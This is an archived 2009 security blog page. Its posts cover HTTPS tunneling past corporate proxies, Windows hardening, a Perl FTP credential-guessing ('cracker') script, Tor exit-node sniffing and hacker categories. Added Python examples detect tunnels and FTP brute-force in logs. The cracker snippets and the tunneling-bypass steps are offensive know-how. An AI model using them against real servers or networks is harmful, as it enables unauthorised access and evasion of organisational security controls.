Archive for March, 2009 | Monthly archive page
if { web applications } then {system intrusion}
Nowadays everyone hears about ASP, PHP or ASP.NET.
These frameworks have enabled programmers to make dynamic websites. Web applications can be heaven for some but a disaster for others.
Let me cut straight to the chase. Suppose you encounter a website www[.]dummy[.]org which runs ASP. Dummy.org's server is guarded by a very sophisticated firewall. You find a script, login.asp, with username and password fields. You somehow hack into it [For details about how to bypass core firewall and web application attacks visit Xc0re Knowledge Core] and see that the login interface has full control over the server and the website; you do nothing, just log out!
Now after that, who needs to hack into the box, download a rootkit and try to get in without authentication!
Peace !
How tunneling software compromises internal security
First off, let me explain what tunneling really is. To keep it simple I won't go into technical details; say for example you take a Lays chips packet, put something inside it that you are usually not allowed to send, seal it back up and send it through the mail. The mail checkpoint sees that it is a Lays chips packet and forwards it, and when it reaches your friend he just unwraps it and gets the otherwise forbidden object.
Now a little technical stuff! What local tunneling software usually uses is HTTPS tunneling: HTTPS is the Lays chips packet and the data you want to tunnel is inside the HTTPS-wrapped packet.
Usually the network design is such that before the gateway firewall there is a proxy server, and in the firewall policy table the proxy has more rights than a normal employee: it is allowed to access the internet with full rights and reach any remote port, whereas a normal employee has to go through the proxy to access the internet and is subject to further checks at the proxy. For example:
A) Employee ---(direct external network access not allowed)---> X [Firewall] X
B) Employee ---> [Proxy] ---> [Firewall] ===> (Allowed)
In case (B) the proxy has checks on orkut.com, youtube.com etc., so the employee can't access these websites, and MSN Messenger / Yahoo Messenger are blocked by the firewall.
That was the scenario. Now I will tell you how it can be bypassed easily:
You download a piece of software, for instance Hopster. It has a live server which it connects to using HTTPS on port 443, and you can even give it the IP address of the proxy you are using. It is that simple: it tells the proxy it wants to connect to port 443 of the live server, the innocent proxy server forwards the request to that server through the firewall, and once connected one can send any data out by just feeding it to Hopster!
Software like MSN Messenger, Yahoo Messenger etc. asks you for a local proxy address; you just give your local host's IP address or 127.0.0.1 plus the tunneling software's port number and you are good to go!
Solution:
The network administrator should install such software himself to find out which remote servers it connects to, and block those IPs at the proxy and at the firewall. Usually there is one server with a single live IP address, so once it is blocked the software cannot connect.
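Blocking a known server IP only works until the tunneling vendor moves; the check the administrator really wants is on the proxy log itself, because every such tunnel shows up there as a CONNECT to port 443. Added example, not code from the original post: it runs over constructed Squid-style access.log lines and flags CONNECT sessions to a host that is not on a (constructed) allow-list, is a bare IP, or stays open unusually long / moves a lot of bytes.

```python
import re
from collections import defaultdict

# Constructed sample lines in Squid's native access.log layout:
# timestamp elapsed_ms client status bytes method url user hierarchy type
SAMPLE_LOG = """\
1238000001.100   3200 10.0.0.12 TCP_TUNNEL/200 48213 CONNECT mail.example.com:443 - HIER_DIRECT/203.0.113.10 -
1238000002.500 900000 10.0.0.12 TCP_TUNNEL/200 9812231 CONNECT 198.51.100.7:443 - HIER_DIRECT/198.51.100.7 -
1238000003.000    120 10.0.0.15 TCP_MISS/200 5120 GET http://intranet.example.com/ - HIER_DIRECT/10.0.0.2 text/html
1238000004.000 870000 10.0.0.12 TCP_TUNNEL/200 7311020 CONNECT 198.51.100.7:443 - HIER_DIRECT/198.51.100.7 -
"""

LINE_RE = re.compile(r"^(\S+)\s+(\d+)\s+(\S+)\s+(\S+)\s+(\d+)\s+(\S+)\s+(\S+)")
IP_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# Constructed allow-list of HTTPS destinations the business actually needs
ALLOWED_HOSTS = {"mail.example.com"}


def parse(line):
    """Split one access.log line into the fields the detector needs."""
    m = LINE_RE.match(line)
    if not m:
        return None
    _ts, elapsed, client, _status, nbytes, method, url = m.groups()
    return {"client": client, "elapsed_ms": int(elapsed),
            "bytes": int(nbytes), "method": method, "url": url}


def suspicious_tunnels(log_text, min_elapsed_ms=600_000, min_bytes=5_000_000):
    """Map client -> [(destination host, reasons)] for CONNECT sessions that look
    like tunnels: host not allow-listed, a bare IP, or long-lived/high-volume."""
    findings = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None or rec["method"] != "CONNECT":
            continue  # only CONNECT opens an opaque TLS tunnel through the proxy
        host = rec["url"].rsplit(":", 1)[0]
        reasons = []
        if host not in ALLOWED_HOSTS:
            reasons.append("not-allowlisted")
        if IP_RE.match(host):
            reasons.append("bare-ip")
        if rec["elapsed_ms"] >= min_elapsed_ms or rec["bytes"] >= min_bytes:
            reasons.append("long-lived")
        if reasons:
            findings[rec["client"]].append((host, reasons))
    return dict(findings)
```

The flagged destinations are the candidates for the proxy and firewall block rules the post recommends.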
Five hardcoded rules for System Security
I always see people complaining that their data got corrupted or they had a virus attack and had to reinstall Windows! That's because people are usually naive and innocent, and the guy in the picture takes advantage of that innocence.
Today I'll tell you five hardcoded rules that you should follow when you get Windows installed or install it yourself.
- After installing Windows, install an antivirus immediately. [People usually tell me they don't run an AV (antivirus) because it slows down their system. I will give a solution for this problem near the end.]
- Once the AV is up and running and updated, install a personal firewall.
- Once the firewall is installed, check that Windows automatic updates are enabled.
- Now follow me: go to My Computer. When the window opens, go to the Tools menu --> Folder Options; when the Folder Options window opens go to the View tab and, under the hidden files and folders option, check "Show hidden files and folders", then uncheck the "Hide extensions for known file types" option.
- Install an anti-spyware program! Normally one comes in the package with an AV, but I prefer a standalone anti-spyware program.
If one follows these rules and sticks to them, he/she won't need to reinstall Windows every time a virus comes along.
Now, referring to the problems:
- If the AV is heavy on your PC, install a lightweight AV. A very good example is Avast AV.
- Personal firewalls: one of my favourites is ZoneAlarm.
Well that's all!
Hope everyone's safe!
Writing a simple FTP cracker with Perl.
Perl is a scripting language with the help of which one can make a lot of good stuff! Today I'll show you how to create a simple FTP cracker!
DISCLAIMER: Everything mentioned in this blog/post is for educational purposes. And I would not be held responsible for any illegal use of the material by anyone.
Full version of the code is here
First off we include Net::FTP:
use Net::FTP;
Now what we will do is create an FTP connection:
my $ftp = Net::FTP->new($IPaddress, Timeout => 5) or die "Cannot connect to $IPaddress: $@";
where $IPaddress is the IP address of the target system and 5 is the timeout, in seconds, before giving up on the connection attempt and moving on to the next one.
Now we just have to add the code to check a username and password.
if ($ftp->login("ftp", "ftp")) {
    my $bogus = "CRACKED Username : ftp password: ftp ";
    print "$bogus \n";
}
$ftp->quit;   # close the control connection
In the above code snippet the script tries username = ftp and password = ftp, and if the attempt succeeds it prints the message:
CRACKED Username : ftp password: ftp
One can hard-code the usernames and passwords as I have done, or read them from a file!
Peace !
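From the server side, a script like the one above leaves a very recognisable trace: a burst of FAIL LOGIN lines from one client, sometimes followed by an OK LOGIN. Added example, not code from the original post: a small detector over constructed vsftpd-style log lines that reports clients with a threshold of failures inside a sliding window and whether they then logged in successfully.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log lines in the layout vsftpd uses by default (assumed here)
SAMPLE_LOG = """\
Wed Mar 25 10:00:01 2009 [pid 2101] [ftp] FAIL LOGIN: Client "203.0.113.5"
Wed Mar 25 10:00:02 2009 [pid 2102] [anonymous] FAIL LOGIN: Client "203.0.113.5"
Wed Mar 25 10:00:03 2009 [pid 2103] [admin] FAIL LOGIN: Client "203.0.113.5"
Wed Mar 25 10:00:04 2009 [pid 2104] [ftp] OK LOGIN: Client "203.0.113.5"
Wed Mar 25 10:05:00 2009 [pid 2105] [alice] FAIL LOGIN: Client "198.51.100.20"
Wed Mar 25 10:05:30 2009 [pid 2106] [alice] OK LOGIN: Client "198.51.100.20"
"""

LINE_RE = re.compile(
    r'^(\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] \[(\S+)\] '
    r'(OK|FAIL) LOGIN: Client "([^"]+)"')


def parse(line):
    """Return (timestamp, user, result, client) or None for non-login lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, user, result, client = m.groups()
    return datetime.strptime(ts, "%a %b %d %H:%M:%S %Y"), user, result, client


def detect_bruteforce(log_text, threshold=3, window=timedelta(minutes=1)):
    """Map client -> (failures in window, logged_in_after) for clients with at
    least `threshold` failed logins inside `window`; a later OK LOGIN from the
    same client is the signature of a successful guess."""
    fails = defaultdict(list)
    hits = {}
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ts, _user, result, client = rec
        if result == "FAIL":
            # keep only failures that fall inside the sliding window
            fails[client] = [t for t in fails[client] if ts - t <= window] + [ts]
            if len(fails[client]) >= threshold:
                hits[client] = (len(fails[client]), False)
        elif client in hits:
            hits[client] = (hits[client][0], True)
    return hits
```

A single failed login followed by success (the alice lines) is normal user behaviour and is not reported; only the burst is.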
Anonymous proxies, a menace for hackers & innocent users
Hey everybody!
People usually hear that anonymous proxies should be banned because hackers use them to compromise systems. On the other hand, proxies can be used to surf the internet anonymously. This is pretty comforting, I know, but we should all watch our step.

Tor (The Onion Router) is free software used for anonymity by almost everybody nowadays. It is nearly impossible to trace a user once he starts using Tor! It looks pretty awesome, but it has a vulnerability, or rather a weakness!
The weakness is the exit-node sniffing problem.

In the picture above, taken from the Tor official website, Alice wants to communicate anonymously with Bob. Her traffic is routed through the Tor network, exits on the other side and reaches its destination, Bob in this case. Until a packet reaches the last node of the Tor network, the exit node, it is encrypted; but as soon as it reaches the exit node the Tor layers are stripped and, unless the application itself encrypts the traffic (HTTPS, for example), it is plain text. At that point, if a hacker owns that exit node and simply runs a sniffer, he/she can get a lot of info on the user. Even the FBI or law enforcement agencies can use this trick to get a lead on hackers. Many hackers and agencies are using this technique presently.
Hacking is an art !
Hacking is an art! Most people think it is evil and that learning it is totally against the law. I, on the other hand, would beg to differ. Learning to hack helps one better understand the theory of attack and also protects oneself against malicious attacks.
Hacking is specializing in the discovery of exploits in systems (for exploitation or prevention) [google.com / define:hacking]. It is a person's own perspective how he/she takes hacking, as an art form or as a crime.
So with the passage of time hackers were divided into different categories:
- Black Hat
- White Hat
- Grey Hat
Black hat hackers, or crackers, are the ones who intrude into systems for profit or malicious activities.
White hats, on the other hand, hack or penetrate a system or network with proper authorization from the owner, and if they find a vulnerability they are allowed to recode and correct it.
Grey hats also do what white hats do, but after the authorized penetration test they do not correct the code and only give a report of their findings to the right person.
So this was an introduction to what hacking is and why hacking is not a crime but an art!